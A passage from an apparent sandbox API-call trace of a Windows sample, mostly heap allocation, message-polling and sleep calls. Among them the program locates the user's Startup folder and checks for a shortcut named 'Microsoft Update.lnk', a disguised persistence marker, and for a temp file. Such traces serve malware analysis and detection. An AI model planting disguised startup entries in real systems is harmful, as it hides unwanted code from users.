dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0233.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0233.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38663a8 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866180 | out: hHeap=0x2af0000) returned 1 [0233.708] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0233.708] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0233.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0233.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0233.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0233.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0233.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0233.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38663a8 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0233.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0233.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0233.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0233.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0233.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0233.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0233.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0233.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0233.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0233.710] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0233.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0233.710] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0233.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0233.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0233.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab668 [0233.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0233.711] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0233.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0233.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0233.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0233.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0233.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0233.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0233.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0233.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0233.712] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0233.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0233.712] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0233.712] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0233.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0233.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0233.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0233.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0233.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0233.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0233.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0233.713] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0233.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0233.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0233.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0233.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0233.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0233.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0233.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0233.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0233.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0233.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0233.713] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0233.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0233.713] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0233.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0233.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0233.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0233.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0233.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0233.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0233.714] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0233.714] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0233.714] timeGetTime () returned 0x117a64e [0233.714] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.714] Sleep (dwMilliseconds=0xa) [0233.753] timeGetTime () returned 0x117a67d [0233.753] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.753] Sleep (dwMilliseconds=0xa) [0233.800] timeGetTime () returned 0x117a6ab [0233.800] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.800] Sleep (dwMilliseconds=0xa) [0233.849] timeGetTime () returned 0x117a6da [0233.849] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.849] Sleep (dwMilliseconds=0xa) [0233.887] timeGetTime () returned 0x117a6fa [0233.887] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.887] Sleep (dwMilliseconds=0xa) [0233.909] timeGetTime () returned 0x117a719 [0233.909] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.909] Sleep (dwMilliseconds=0xa) [0233.927] timeGetTime () returned 0x117a728 [0233.927] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.927] Sleep (dwMilliseconds=0xa) [0233.940] timeGetTime () returned 0x117a738 [0233.940] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.940] Sleep (dwMilliseconds=0xa) [0233.970] timeGetTime () returned 0x117a748 [0233.970] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.970] Sleep (dwMilliseconds=0xa) [0233.990] timeGetTime () returned 0x117a76b [0233.990] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0233.990] Sleep (dwMilliseconds=0xa) [0234.002] timeGetTime () returned 0x117a777 [0234.002] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.002] Sleep (dwMilliseconds=0xa) [0234.018] timeGetTime () returned 0x117a787 [0234.018] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.018] Sleep (dwMilliseconds=0xa) [0234.035] timeGetTime () returned 0x117a797 [0234.035] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.035] Sleep (dwMilliseconds=0xa) [0234.051] timeGetTime () returned 0x117a7a7 [0234.051] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.051] Sleep (dwMilliseconds=0xa) [0234.066] timeGetTime () returned 0x117a7b6 [0234.066] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.066] Sleep (dwMilliseconds=0xa) [0234.083] timeGetTime () returned 0x117a7c6 [0234.083] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.083] Sleep (dwMilliseconds=0xa) [0234.154] timeGetTime () returned 0x117a80f [0234.154] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.154] Sleep (dwMilliseconds=0xa) [0234.275] timeGetTime () returned 0x117a880 [0234.275] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0234.276] TranslateMessage (lpMsg=0x8cf798) returned 0 [0234.276] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0234.276] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0234.276] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0234.276] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.276] Sleep (dwMilliseconds=0xa) [0234.299] timeGetTime () returned 0x117a8a0 [0234.299] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.299] Sleep (dwMilliseconds=0xa) [0234.315] timeGetTime () returned 0x117a8af [0234.315] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.315] Sleep (dwMilliseconds=0xa) [0234.331] timeGetTime () returned 0x117a8bf [0234.331] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.331] Sleep (dwMilliseconds=0xa) [0234.346] timeGetTime () returned 0x117a8cf [0234.346] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.346] Sleep (dwMilliseconds=0xa) [0234.363] timeGetTime () returned 0x117a8de [0234.363] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.363] Sleep (dwMilliseconds=0xa) [0234.378] timeGetTime () returned 0x117a8ee [0234.378] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.378] Sleep (dwMilliseconds=0xa) [0234.393] timeGetTime () returned 0x117a8fd [0234.393] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0234.393] Sleep (dwMilliseconds=0xa) 